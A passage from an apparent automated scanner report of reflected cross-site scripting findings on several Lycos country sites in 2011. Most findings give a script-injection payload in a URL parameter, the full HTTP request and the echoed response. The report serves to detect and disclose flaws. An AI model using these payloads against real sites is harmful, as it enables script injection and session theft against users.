<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer3105a"><script>alert(1)</script>cd382cacad6&diktfc=853EDA99F07F53D416D5E3CD7F5D5B48E44C6481A6E4&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9b3"><script>alert(1)</script>a7b67e9b35b was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomebf9b3"><script>alert(1)</script>a7b67e9b35b&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839806000; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomebf9b3"><script>alert(1)</script>a7b67e9b35b&utm_campaign=home_flags&utm_medium=footer&diktfc=039BD57F45D457E3CE76898C1DBFE9796871F4D7FBF0&mobile=1"> ...[SNIP]...
1.351. http://www.lycos.com.mx/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.mx
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f99e7"><script>alert(1)</script>9367d972345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?f99e7"><script>alert(1)</script>9367d972345=1 HTTP/1.1 Host: www.lycos.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161730131; path=/ Date: Mon, 07 Feb 2011 14:52:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?f99e7"><script>alert(1)</script>9367d972345=1&diktfc=2BB81AE23DE928AA59DCC47B482E5AB245CD89404E76&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7767c"><script>alert(1)</script>1cc6da810f4 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags7767c"><script>alert(1)</script>1cc6da810f4&utm_medium=footer HTTP/1.1 Host: www.lycos.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:52:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags7767c"><script>alert(1)</script>1cc6da810f4&utm_medium=footer&diktfc=2A3FD8A00A6D7F4DF2F3B05CB9EDA33DC70670336505&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3486"><script>alert(1)</script>fcef563c8b4 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerf3486"><script>alert(1)</script>fcef563c8b4 HTTP/1.1 Host: www.lycos.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839838670; path=/ Date: Mon, 07 Feb 2011 14:52:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerf3486"><script>alert(1)</script>fcef563c8b4&diktfc=6AD1084B6AFD2434AFD4EC1844EDBB1F99ED16BFD34E&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e24ea"><script>alert(1)</script>0b71dd53482 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomee24ea"><script>alert(1)</script>0b71dd53482&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomee24ea"><script>alert(1)</script>0b71dd53482&utm_campaign=home_flags&utm_medium=footer&diktfc=CCD4218D0B9BC93C3DE61D5690FC2659163902671BCE&mobile=1"> ...[SNIP]...
1.355. http://www.lycos.com.pe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.pe
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 890de"><script>alert(1)</script>1b9d80da9f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?890de"><script>alert(1)</script>1b9d80da9f4=1 HTTP/1.1 Host: www.lycos.com.pe Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3977165758; path=/ Date: Mon, 07 Feb 2011 14:52:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?890de"><script>alert(1)</script>1b9d80da9f4=1&diktfc=47EBFC564F77503532930B80F23A2F2212EC47765319&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343cf"><script>alert(1)</script>5c1127e3aa2 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags343cf"><script>alert(1)</script>5c1127e3aa2&utm_medium=footer HTTP/1.1 Host: www.lycos.com.pe Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839804911; path=/ Date: Mon, 07 Feb 2011 14:53:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13987
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags343cf"><script>alert(1)</script>5c1127e3aa2&utm_medium=footer&diktfc=8F6AC2064D7B34780B064279686F7E8D5FBFD7749E43&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d4f4"><script>alert(1)</script>412344f1e05 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer3d4f4"><script>alert(1)</script>412344f1e05 HTTP/1.1 Host: www.lycos.com.pe Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:53:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:01 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13987
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer3d4f4"><script>alert(1)</script>412344f1e05&diktfc=CA1421ECBA171CF3CB1A2D66FA42144EE98BD5B42582&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30c0b"><script>alert(1)</script>137709880fc was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome30c0b"><script>alert(1)</script>137709880fc&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.pe Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839804911; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13987
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome30c0b"><script>alert(1)</script>137709880fc&utm_campaign=home_flags&utm_medium=footer&diktfc=936FDEB1AD1CABA958D7BCBC47ECEC3586DC77B480EB&mobile=1"> ...[SNIP]...
1.359. http://www.lycos.com.ve/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.ve
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5b4"><script>alert(1)</script>bfc78bcebd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?8d5b4"><script>alert(1)</script>bfc78bcebd4=1 HTTP/1.1 Host: www.lycos.com.ve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839801644; path=/ Date: Mon, 07 Feb 2011 14:52:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?8d5b4"><script>alert(1)</script>bfc78bcebd4=1&diktfc=10BD751350C3FB8376035CFBAF22A822531F5B2B259C&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35d25"><script>alert(1)</script>d1300b832bc was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags35d25"><script>alert(1)</script>d1300b832bc&utm_medium=footer HTTP/1.1 Host: www.lycos.com.ve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags35d25"><script>alert(1)</script>d1300b832bc&utm_medium=footer&diktfc=FC13D53822563B6CE0FA6CC557C419C162186360F093&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191b1"><script>alert(1)</script>133a68b070f was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer191b1"><script>alert(1)</script>133a68b070f HTTP/1.1 Host: www.lycos.com.ve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839837581; path=/ Date: Mon, 07 Feb 2011 14:52:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:59 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer191b1"><script>alert(1)</script>133a68b070f&diktfc=4AC1E8E6F1B7A0A10A649B144C7184F58ED74CE8AB41&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d58"><script>alert(1)</script>efd4c098d4b was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome96d58"><script>alert(1)</script>efd4c098d4b&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.ve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839837581; path=/ Date: Mon, 07 Feb 2011 14:52:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome96d58"><script>alert(1)</script>efd4c098d4b&utm_campaign=home_flags&utm_medium=footer&diktfc=74F6C355CE3D9098296DE9A81FDCE6D8993F75600A06&mobile=1"> ...[SNIP]...
1.363. http://www.lycos.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8762c"><script>alert(1)</script>a8d67ce0fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?8762c"><script>alert(1)</script>a8d67ce0fc7=1 HTTP/1.1 Host: www.lycos.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161726864; path=/ Date: Mon, 07 Feb 2011 14:52:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?8762c"><script>alert(1)</script>a8d67ce0fc7=1&diktfc=EA6B71B20954009117AC23A4A39AA0C5052D53B3F53B&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e4e"><script>alert(1)</script>82cecb72db3 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags94e4e"><script>alert(1)</script>82cecb72db3&utm_medium=footer HTTP/1.1 Host: www.lycos.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161733398; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags94e4e"><script>alert(1)</script>82cecb72db3&utm_medium=footer&diktfc=2DF1F0B9FBB7BE3142C8D4A969B83A15C88BFC3C58B2&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e244e"><script>alert(1)</script>83c60c484c5 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footere244e"><script>alert(1)</script>83c60c484c5 HTTP/1.1 Host: www.lycos.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Mon, 07 Feb 2011 14:52:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:58 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="de"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footere244e"><script>alert(1)</script>83c60c484c5&diktfc=1328757F66D29BCC48D83FBD282E15CA79F97F8E5CCB&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deeee"><script>alert(1)</script>625b54b2a96 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomedeeee"><script>alert(1)</script>625b54b2a96&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161725775; path=/ Date: Mon, 07 Feb 2011 14:52:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14595
